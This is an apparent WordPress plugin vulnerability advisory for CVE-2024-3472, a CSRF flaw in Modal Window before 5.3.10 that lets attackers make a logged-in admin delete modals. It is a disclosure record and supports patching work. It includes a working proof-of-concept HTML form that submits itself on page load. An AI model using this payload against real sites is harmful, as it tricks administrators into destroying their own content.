Modal Window < 5.3.10 – Modal Deletion via CSRF | CVE 2024-3472 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when bulk deleting modals, which could allow attackers to make a logged in admin delete them via a CSRF attack

Proof of Concept

Have a logged in admin open an HTML file containing where `ID` is an existing modal: 

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=modal-window" method="POST">
        <input type="text" name="ID" value="1" />
        <input type="text" name="action" value="delete-items" />
        <input type="text" name="action2" value="delete-items" />
        action
        <input type="submit" value="submit">
    </form>
</body>
```

Affects Plugins

Fixed in 5.3.10

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

Miscellaneous

Original Researcher

Bob Matyas

Submitter

Bob Matyas

Submitter website

https://www.bobmatyas.com

Submitter twitter

Verified

Yes

WPVDB ID

d42f74dd-520f-40aa-9cf0-3544db9562c7

Timeline

Publicly Published

2024-04-11 (about 1 months ago)

Added

2024-04-11 (about 1 months ago)

Last Updated

2024-04-11 (about 1 months ago)

Other

Published

Title

Published

2023-03-29

Title

GMAce <= 1.5.2 - Arbitrary File Creation/Deletion/Update via CSRF

Published

2023-11-09

Title

Woo Custom and Sequential Order Number <= 2.6.0 - Cross-Site Request Forgery

Published

2023-09-05

Title

Backup Migration < 1.3.0 - Cross-Site Request Forgery

Published

2023-12-01

Title

Abandoned Cart Lite for WooCommerce < 5.16.2 - Multiple CSRF

Published

2022-06-22

Title

DX Share Selection < 1.5 - Stored Cross-Site Scripting via CSRF